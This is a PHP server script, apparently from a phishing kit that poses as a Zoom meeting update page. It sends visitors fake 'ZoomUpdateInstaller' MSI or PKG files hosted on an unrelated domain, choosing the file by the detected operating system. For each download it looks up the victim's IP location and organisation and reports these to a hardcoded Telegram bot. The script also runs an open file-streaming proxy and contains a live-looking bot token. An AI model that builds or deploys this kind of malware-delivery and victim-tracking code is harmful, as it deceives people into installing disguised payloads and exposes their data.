File: /home/kevinefranco/public_html/zoommeeting/process2.php
<?php
// =====================================================
// CONFIGURATION SECTION — EDIT THESE VALUES
// =====================================================
$DOWNLOAD_URL_WINDOWS = "https://kevinefranco.pt/zoommeeting/update/ZoomUpdateInstaller.msi";
$DOWNLOAD_URL_MACOS = "https://kevinefranco.pt/zoommeeting/update/ZoomUpdateInstaller.pkg";
$TELEGRAM_BOT_TOKEN = "7068069867:AAFubCYpDNtFJaMqibFfIMq_DP7kingqDMA";
$TELEGRAM_CHAT_ID = "6159112165";
// Fallback URLs (optional)
$DOWNLOAD_URL_WINDOWS_FALLBACK = "https://kevinefranco.pt/zoommeeting/update/ZoomUpdateInstaller.msi";
$DOWNLOAD_URL_MACOS_FALLBACK = "https://kevinefranco.pt/zoommeeting/update/ZoomUpdateInstaller.pkg";
// ==================================================================
// PROXY MODE (if ?proxy=1) - MUST RUN BEFORE ANY JSON HEADERS
// ==================================================================
if (isset($_GET['proxy']) && $_GET['proxy'] == "1") {
processProxyRequest();
exit;
}
// ==================================================================
// NORMAL MODE (JSON API)
// ==================================================================
header('Content-Type: application/json');
header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Methods: POST, GET, OPTIONS');
header('Access-Control-Allow-Headers: Content-Type, User-Agent, Accept, X-Requested-With');
if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
http_response_code(200);
exit();
}
if ($_SERVER['REQUEST_METHOD'] !== 'POST' && $_SERVER['REQUEST_METHOD'] !== 'GET') {
http_response_code(405);
echo json_encode(['error' => 'Method not allowed']);
exit();
}
// Handle GET requests for direct download links
if ($_SERVER['REQUEST_METHOD'] === 'GET' && isset($_GET['download'])) {
handleDirectDownload();
exit;
}
// Parse JSON input for POST requests
$input = [];
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$contentType = $_SERVER['CONTENT_TYPE'] ?? '';
if (stripos($contentType, 'application/json') !== false) {
$input = json_decode(file_get_contents('php://input'), true);
} else {
$input = $_POST;
}
}
if (!$input) {
$input = $_GET;
}
/**
* ROBUST OS DETECTION FUNCTION
*/
function detectOS() {
$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? '';
$acceptLanguage = $_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? '';
$accept = $_SERVER['HTTP_ACCEPT'] ?? '';
// Create detection score
$windowsScore = 0;
$macScore = 0;
$linuxScore = 0;
$iosScore = 0;
$androidScore = 0;
// Convert to lowercase for matching
$ua = strtolower($userAgent);
// 1. PRIMARY USER-AGENT PATTERNS
$patterns = [
'windows' => [
'/windows nt 10\.0/i', '/windows nt 6\.3/i', '/windows nt 6\.2/i',
'/windows nt 6\.1/i', '/windows nt 6\.0/i', '/windows nt 5\./i',
'/win32/i', '/win64/i', '/wow64/i', '/windows/i',
'/msie 10\.0/i', '/trident\/7\.0/i'
],
'macos' => [
'/macintosh/i', '/mac os x/i', '/macos/i', '/mac_powerpc/i',
'/os x/i', '/darwin/i', '/cfnetwork/i'
],
'linux' => [
'/linux/i', '/x11/i', '/ubuntu/i', '/debian/i', '/fedora/i',
'/redhat/i', '/suse/i', '/gentoo/i'
],
'ios' => [
'/iphone/i', '/ipad/i', '/ipod/i', '/ios/i',
'/like mac os x/i'
],
'android' => [
'/android/i', '/android [0-9]/i'
]
];
foreach ($patterns['windows'] as $pattern) {
if (preg_match($pattern, $userAgent)) $windowsScore += 3;
}
foreach ($patterns['macos'] as $pattern) {
if (preg_match($pattern, $userAgent)) $macScore += 3;
}
foreach ($patterns['linux'] as $pattern) {
if (preg_match($pattern, $userAgent)) $linuxScore += 3;
}
foreach ($patterns['ios'] as $pattern) {
if (preg_match($pattern, $userAgent)) $iosScore += 3;
}
foreach ($patterns['android'] as $pattern) {
if (preg_match($pattern, $userAgent)) $androidScore += 3;
}
// 2. SECONDARY INDICATORS
// Check for Edge on Windows
if (strpos($ua, 'edg/') !== false && $windowsScore > 0) {
$windowsScore += 2;
}
// Check for Safari on Mac
if (strpos($ua, 'safari') !== false && !strpos($ua, 'chrome') && $macScore > 0) {
$macScore += 2;
}
// Check for Chrome OS (count as Linux)
if (strpos($ua, 'cros') !== false) {
$linuxScore += 3;
}
// 3. HTTP HEADER ANALYSIS
// Accept-Language patterns (en-US typical for Windows, en-ca for Mac)
if (preg_match('/en\-us/i', $acceptLanguage)) $windowsScore += 1;
if (preg_match('/en\-ca|en\-gb/i', $acceptLanguage)) $macScore += 1;
// Accept header patterns (some browsers send specific MIME types)
if (strpos($accept, 'application/vnd.ms-') !== false) $windowsScore += 1;
// 4. PLATFORM HEADER (if available)
if (isset($_SERVER['HTTP_SEC_CH_UA_PLATFORM'])) {
$platform = strtolower($_SERVER['HTTP_SEC_CH_UA_PLATFORM']);
if (strpos($platform, 'windows') !== false) $windowsScore += 5;
if (strpos($platform, 'mac') !== false) $macScore += 5;
if (strpos($platform, 'linux') !== false) $linuxScore += 5;
}
// 5. FALLBACK TO COMMON PATTERNS IF NO STRONG DETECTION
if ($windowsScore === 0 && $macScore === 0 && $linuxScore === 0 &&
$iosScore === 0 && $androidScore === 0) {
// Very basic fallback patterns
if (strpos($ua, 'win') !== false) $windowsScore = 1;
elseif (strpos($ua, 'mac') !== false) $macScore = 1;
elseif (strpos($ua, 'linux') !== false) $linuxScore = 1;
elseif (strpos($ua, 'iphone') !== false || strpos($ua, 'ipad') !== false) $iosScore = 1;
elseif (strpos($ua, 'android') !== false) $androidScore = 1;
}
// 6. DETERMINE WINNER
$scores = [
'windows' => $windowsScore,
'macos' => $macScore,
'linux' => $linuxScore,
'ios' => $iosScore,
'android' => $androidScore
];
arsort($scores);
$detectedOS = key($scores);
// Only return if score is significant
if ($scores[$detectedOS] > 0) {
return $detectedOS;
}
// 7. IP-BASED DETECTION FALLBACK (optional)
$ip = getRealIP();
if ($ip !== 'unknown') {
// Windows commonly uses different default ports/services
// This is a very rough heuristic
if (isWindowsLikelyByIP($ip)) {
return 'windows';
}
}
// Default fallback
return 'windows';
}
/**
* Simple IP-based Windows detection heuristic
*/
function isWindowsLikelyByIP($ip) {
// This is a placeholder - in reality, you'd need more sophisticated detection
// Could check timezone, language settings from IP, etc.
return true; // Default to Windows
}
/**
* Get the appropriate download URL with fallback
*/
function getDownloadUrl($os) {
global $DOWNLOAD_URL_WINDOWS, $DOWNLOAD_URL_MACOS;
global $DOWNLOAD_URL_WINDOWS_FALLBACK, $DOWNLOAD_URL_MACOS_FALLBACK;
$primaryUrl = '';
$fallbackUrl = '';
switch ($os) {
case 'windows':
$primaryUrl = $DOWNLOAD_URL_WINDOWS;
$fallbackUrl = $DOWNLOAD_URL_WINDOWS_FALLBACK;
break;
case 'macos':
$primaryUrl = $DOWNLOAD_URL_MACOS;
$fallbackUrl = $DOWNLOAD_URL_MACOS_FALLBACK;
break;
case 'linux':
case 'ios':
case 'android':
default:
$primaryUrl = $DOWNLOAD_URL_WINDOWS;
$fallbackUrl = $DOWNLOAD_URL_WINDOWS_FALLBACK;
}
// Test if primary URL is accessible
if (isUrlAccessible($primaryUrl)) {
return [
'url' => $primaryUrl,
'isFallback' => false
];
}
// Use fallback if available
if ($fallbackUrl && isUrlAccessible($fallbackUrl)) {
return [
'url' => $fallbackUrl,
'isFallback' => true
];
}
// Last resort - return primary even if not tested
return [
'url' => $primaryUrl,
'isFallback' => false
];
}
/**
* Check if URL is accessible (HEAD request)
*/
function isUrlAccessible($url, $timeout = 5) {
if (!filter_var($url, FILTER_VALIDATE_URL)) {
return false;
}
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_NOBODY, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return ($httpCode >= 200 && $httpCode < 400);
}
/**
* Get client IP address
*/
function getRealIP() {
$headers = ['HTTP_CF_CONNECTING_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_REAL_IP', 'REMOTE_ADDR'];
foreach ($headers as $h) {
if (!empty($_SERVER[$h])) {
$ip = explode(',', $_SERVER[$h])[0];
$ip = trim($ip);
if (filter_var($ip, FILTER_VALIDATE_IP)) {
return $ip;
}
}
}
return $_SERVER['REMOTE_ADDR'] ?? 'unknown';
}
/**
* Handle direct download requests
*/
function handleDirectDownload() {
$os = isset($_GET['os']) ? $_GET['os'] : detectOS();
$urlInfo = getDownloadUrl($os);
// Send appropriate headers for download
$filename = basename($urlInfo['url']);
$extension = pathinfo($filename, PATHINFO_EXTENSION);
// Set content type based on extension
$contentTypes = [
'msi' => 'application/x-msi',
'pkg' => 'application/x-newton-compatible-pkg',
'exe' => 'application/x-msdownload',
'dmg' => 'application/x-apple-diskimage',
'zip' => 'application/zip',
'dll' => 'application/x-msdownload'
];
$contentType = $contentTypes[$extension] ?? 'application/octet-stream';
header('Content-Type: ' . $contentType);
header('Content-Disposition: attachment; filename="' . $filename . '"');
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
// For large files, use chunked transfer
header('Accept-Ranges: bytes');
// Stream the file
$ch = curl_init($urlInfo['url']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_BUFFERSIZE, 8192);
// Set user agent to mimic popular browsers for better compatibility
$userAgents = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0'
];
curl_setopt($ch, CURLOPT_USERAGENT, $userAgents[array_rand($userAgents)]);
curl_setopt($ch, CURLOPT_WRITEFUNCTION, function($curl, $data) {
echo $data;
ob_flush();
flush();
return strlen($data);
});
curl_exec($ch);
if (curl_errno($ch)) {
// If streaming fails, redirect to the URL
header('Location: ' . $urlInfo['url']);
}
curl_close($ch);
exit;
}
/**
* Process proxy requests
*/
function processProxyRequest() {
// [Previous proxy code remains the same, just extracted to a function]
// Read incoming url from POST, GET or JSON body
$rawUrl = null;
if (!empty($_POST['url'])) {
$rawUrl = $_POST['url'];
} elseif (!empty($_GET['url'])) {
$rawUrl = $_GET['url'];
} else {
$inputBody = file_get_contents('php://input');
if ($inputBody) {
$jsonBody = json_decode($inputBody, true);
if (json_last_error() === JSON_ERROR_NONE && !empty($jsonBody['url'])) {
$rawUrl = $jsonBody['url'];
}
}
}
if (!$rawUrl) {
http_response_code(400);
header('Content-Type: text/plain');
echo 'Missing url parameter';
exit;
}
// Basic sanitation
$rawUrl = trim($rawUrl);
if (preg_match('/[\r\n]/', $rawUrl)) {
http_response_code(400);
header('Content-Type: text/plain');
echo 'Invalid url';
exit;
}
// ---------- Safer ANY-HOST (blocks private/reserved IPs) ----------
$parsed = parse_url($rawUrl);
if (!$parsed || empty($parsed['host'])) {
http_response_code(400);
header('Content-Type: text/plain');
echo 'Malformed URL';
exit;
}
$host = $parsed['host'];
$resolvedIps = @gethostbynamel($host);
if (empty($resolvedIps)) {
$resolved = @gethostbyname($host);
if ($resolved === $host || !$resolved) {
http_response_code(400);
header('Content-Type: text/plain');
echo 'Unable to resolve host';
exit;
}
$resolvedIps = [$resolved];
}
foreach ($resolvedIps as $ip) {
if (!filter_var($ip, FILTER_VALIDATE_IP)) {
http_response_code(400);
header('Content-Type: text/plain');
echo 'Invalid resolved IP';
exit;
}
if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
http_response_code(403);
header('Content-Type: text/plain');
echo 'Access to private/reserved IPs not allowed';
exit;
}
}
// Enforce HTTPS (optional)
if (empty($parsed['scheme']) || strtolower($parsed['scheme']) !== 'https') {
http_response_code(400);
header('Content-Type: text/plain');
echo 'Only HTTPS URLs are allowed';
exit;
}
// ------------------------------------------------------------------
// HEAD request for headers
$headCh = curl_init($rawUrl);
curl_setopt($headCh, CURLOPT_NOBODY, true);
curl_setopt($headCh, CURLOPT_RETURNTRANSFER, true);
curl_setopt($headCh, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($headCh, CURLOPT_MAXREDIRS, 8);
curl_setopt($headCh, CURLOPT_SSL_VERIFYPEER, true);
curl_setopt($headCh, CURLOPT_HEADER, true);
curl_setopt($headCh, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($headCh, CURLOPT_TIMEOUT, 30);
// Set common user agent
curl_setopt($headCh, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
$headResponse = curl_exec($headCh);
if ($headResponse === false) {
$err = curl_error($headCh);
curl_close($headCh);
http_response_code(502);
echo "Failed to fetch remote headers: $err";
exit;
}
$remoteContentType = null;
$remoteContentDisposition = null;
$remoteContentLength = null;
$remoteStatusCode = curl_getinfo($headCh, CURLINFO_HTTP_CODE) ?: 200;
$headerBlocks = preg_split("/\r\n\r\n/", trim($headResponse));
$lastHeaders = array_pop($headerBlocks);
$lines = preg_split("/\r\n/", $lastHeaders);
foreach ($lines as $line) {
if (stripos($line, 'Content-Type:') === 0) {
$remoteContentType = trim(substr($line, 13));
} elseif (stripos($line, 'Content-Disposition:') === 0) {
$remoteContentDisposition = trim(substr($line, 20));
} elseif (stripos($line, 'Content-Length:') === 0) {
$remoteContentLength = trim(substr($line, 16));
}
}
curl_close($headCh);
if (!headers_sent()) {
http_response_code($remoteStatusCode);
header('Content-Type: ' . ($remoteContentType ?: 'application/octet-stream'));
if ($remoteContentDisposition) {
header('Content-Disposition: ' . $remoteContentDisposition);
} else {
$fallbackName = basename($parsed['path'] ?? 'download.bin');
header('Content-Disposition: attachment; filename="' . $fallbackName . '"');
}
if ($remoteContentLength) {
header('Content-Length: ' . $remoteContentLength);
}
}
// Stream file
$ch = curl_init($rawUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_MAXREDIRS, 8);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
curl_setopt($ch, CURLOPT_BUFFERSIZE, 16384);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
curl_setopt($ch, CURLOPT_WRITEFUNCTION, function($curl, $data) {
echo $data;
@ob_flush();
@flush();
return strlen($data);
});
curl_exec($ch);
curl_close($ch);
exit;
}
// ==================================================================
// MAIN REQUEST HANDLER
// ==================================================================
$action = $input['action'] ?? '';
if ($action === 'download' || $action === '') {
// Detect operating system
$os = detectOS();
// Get appropriate download URL
$urlInfo = getDownloadUrl($os);
$ip = getRealIP();
$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? 'unknown';
$referer = $_SERVER['HTTP_REFERER'] ?? 'direct';
// Geo lookup
$country = $region = $org = $hostname = '';
$geo = @file_get_contents("http://ip-api.com/json/{$ip}?fields=status,country,regionName,org,reverse");
if ($geo) {
$g = json_decode($geo, true);
if (($g['status'] ?? '') === 'success') {
$country = $g['country'] ?? '';
$region = $g['regionName'] ?? '';
$org = $g['org'] ?? '';
$hostname = $g['reverse'] ?? '';
}
}
// Telegram alert
if ($TELEGRAM_BOT_TOKEN !== "REPLACE_WITH_TELEGRAM_TOKEN" &&
$TELEGRAM_CHAT_ID !== "REPLACE_WITH_CHAT_ID") {
$msg = "🌍 New Download Alert!\n\n";
$msg .= "📌 IP: $ip\n";
$msg .= "🏳 Country: $country\n";
$msg .= "📍 Region: $region\n";
$msg .= "🏢 Org: $org\n";
$msg .= "🔗 Hostname: $hostname\n";
$msg .= "🖥 User-Agent: " . substr($userAgent, 0, 100) . "\n";
$msg .= "🌐 Referer: " . substr($referer, 0, 100) . "\n";
$msg .= "💻 Detected OS: " . strtoupper($os) . "\n";
$msg .= "📥 Using " . ($urlInfo['isFallback'] ? "FALLBACK " : "") . "URL\n";
$msg .= "⬇ Download URL: " . $urlInfo['url'];
$turl = "https://api.telegram.org/bot{$TELEGRAM_BOT_TOKEN}/sendMessage";
@file_get_contents($turl . "?chat_id={$TELEGRAM_CHAT_ID}&text=" . urlencode($msg));
}
// Return multiple download options for maximum compatibility
echo json_encode([
'success' => true,
'os' => $os,
'downloadUrl' => $urlInfo['url'],
'directDownload' => $_SERVER['REQUEST_SCHEME'] . '://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . '?download=1&os=' . $os,
'proxyDownload' => $_SERVER['REQUEST_SCHEME'] . '://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . '?proxy=1&url=' . urlencode($urlInfo['url']),
'isFallback' => $urlInfo['isFallback'],
'message' => 'Download initiated for ' . ucfirst($os),
'userAgent' => $userAgent,
'detectionScore' => 'high' // Can be enhanced to return actual scores
]);
exit;
}
// OS detection endpoint
if ($action === 'detect_os') {
$os = detectOS();
$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? 'unknown';
echo json_encode([
'success' => true,
'os' => $os,
'userAgent' => $userAgent,
'headers' => [
'user_agent' => $userAgent,
'accept_language' => $_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? '',
'platform' => $_SERVER['HTTP_SEC_CH_UA_PLATFORM'] ?? 'not_sent',
'accept' => $_SERVER['HTTP_ACCEPT'] ?? ''
],
'message' => 'OS detection completed'
]);
exit;
}
// URL test endpoint
if ($action === 'test_url') {
$url = $input['url'] ?? '';
if (!$url) {
echo json_encode(['error' => 'No URL provided']);
exit;
}
$isAccessible = isUrlAccessible($url);
echo json_encode([
'success' => true,
'url' => $url,
'accessible' => $isAccessible,
'message' => $isAccessible ? 'URL is accessible' : 'URL is not accessible'
]);
exit;
}
// System info endpoint
if ($action === 'system_info') {
echo json_encode([
'success' => true,
'server' => [
'php_version' => PHP_VERSION,
'server_software' => $_SERVER['SERVER_SOFTWARE'] ?? '',
'server_name' => $_SERVER['SERVER_NAME'] ?? '',
'https' => isset($_SERVER['HTTPS']) ? 'yes' : 'no'
],
'client' => [
'ip' => getRealIP(),
'user_agent' => $_SERVER['HTTP_USER_AGENT'] ?? '',
'accept_language' => $_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? '',
'detected_os' => detectOS()
]
]);
exit;
}
echo json_encode(['error' => 'Unknown action']);
exit;
?>